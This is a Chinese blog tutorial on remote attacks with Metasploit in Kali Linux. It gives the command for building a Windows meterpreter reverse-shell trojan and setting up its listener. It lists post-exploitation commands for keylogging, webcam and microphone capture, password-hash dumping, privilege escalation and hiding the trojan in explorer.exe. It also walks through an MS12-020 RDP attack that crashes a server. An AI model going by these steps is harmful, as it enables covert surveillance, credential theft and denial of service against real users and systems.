1. 程式人生 > >kali linux 遠程攻擊

kali linux 遠程攻擊

安全入門文章

Metasploit

1啟動:msfconsole

技術分享

技術分享

exploit 漏洞利用工具

payloads ----àshellcode 漏洞利用後執行的代碼

木馬 控制 服務器

遠程控制 木馬程序

2.根據自己的ip生成一個木馬

msfpayload windows/meterpreter/reverse_tcp LHOST=linuxip LPORT=55555 X > test.exe

windows/meterpreter/reverse_tcp 目錄

LHOST 本地的IP

LPORT 端口 (高端口容易過防火墻)

X 二進制 > test.exe 二進制文件(木馬程序)

技術分享

技術分享主文件夾下

3.技術分享

use exploit/multi/handler

使用handler這個模塊

4.使用show options 查看參數(發現無參數)

.技術分享

5.直接選下一個 set PAYLOAD windows/meterpreter/reverse_tcp

reverse_tcp 反向的鏈接(使用 shellcold 程序

技術分享

6.此時再次查看參數 show options

技術分享

LHOST = 生成木馬的linux IP 地址 (均要填寫)

LPORT = 高端口 55555

7.填寫生成木馬的ip 以及端口

set LHOST linux IP

set LPORT 55555

技術分享

生成完後,再次查看是否填寫 show options

技術分享

8.執行 exploit (等待鏈接狀態)

等待點擊木馬

Metasploit(工具使用)

background 將會話放入後臺

sessions -l 查看後臺的會話

sessions -i 1 切換回剛才的會話

註入進程(防止木馬被關閉)

ps 得到想要的PID進程

migrate PID 註入

216 184 explorer.exe 桌面管理進程)

migrate 216 註入

(查看進程 PS

例如 meterpreter> run vnc 開啟遠程桌面

文件管理功能 file system commands

download

edit (編輯文件) 後面直接加文件名

cat(查看文件)

mkdir (創建文件夾)

mv (移動文件)

rm (刪除文件)

upload (上傳)

rmdir (刪除文件夾)

網絡和系統操作 Networking commands

arp (查看arp緩存表)

getproxy (獲取本機的代理)

ifconfig

ipconfig

netstat (查看本機的端口鏈接)

系統操作

kill 結束進程 (後面直接跟進程的PID號)

ps 查看進程

reboot 重啟

reg 修改註冊表

shell 獲取終端

shutdown 關機

sysinfo 獲取電腦信息

用戶和其余操作 user interface commands

enumdesktops 用戶登錄數

keyscan_dump 鍵盤記錄_下載

keyscan_start 鍵盤記錄_開始

keyscan_stop 鍵盤記錄_停止

uictl 獲得鍵盤鼠標控制權

攝像頭操作

record_mic 音頻錄制

webcam_chat 查看攝像頭接口

webcam_list 查看攝像頭列表

webcam_stream 攝像頭視頻錄制

getsystem 獲取高權限

hashdump 下載管理員的哈希密文

鍵盤記錄的用法

1.keyscan_start 開始記錄

2). 再次 keyscan_dump 下載查看記錄

3. Keyscan_stop 停止監聽

鍵盤鼠標的鎖定

uictl -h 查看參數

enable(打開) disable(鎖定) keyboard(鍵盤) mouse(鼠標)

例:uictl disable keyboard 鎖定鍵盤

註:鍵盤鎖定時,win+E 任然可以用

音頻錄制:先查看參數在錄制

Metasploit(服務器藍屏攻擊)

條件:服務器必須開啟 3389 端口( netstat an 可進行查看)

目標:(DDOS 攻擊192.168.X.X

漏洞名稱:MS12020

1啟動:msfconsole

2.輸入 search ms12-020

解釋:

auxiliary/dos/windows/rdp/ms12_020_maxchannelids

服務器遠程桌面的模塊

auxiliary/scanner/rdp/ms12_020_check

查看是否存在該漏洞

3. 檢查 use auxiliary/scanner/rdp/ms12_020_check

(查看參數 show options)

RHOSTS R開頭為遠程主機

4.set RHOSTS 服務器的IP

5. 查看該端口是否存在 exploit

6.換模塊 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

7.查看參數 show options

寫入IP : set RHOST 服務器IP 再次查看是否設置成功

8.重新開一個終端,用ping (服務器) :正常應為ping

(在網站的搜索欄,進入看是否能進入:輸入服務器的IP

9. 輸入 exploit 攻擊開始

結果:服務器藍屏,無法ping

開啟:3389

http://blog.csdn.net/bekilledlzy/article/details/1817637

Ms12-020解決措施

http://cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm

註:

如果對方開啟了防火墻或者修改了3389端口,可以通過下面方式查看:有一個 XXXX/tcp open realserver (可疑)

端口講解

http://vip.2cto.com/jc/241.html


本文出自 “10883981” 博客,轉載請與作者聯系!

kali linux 遠程攻擊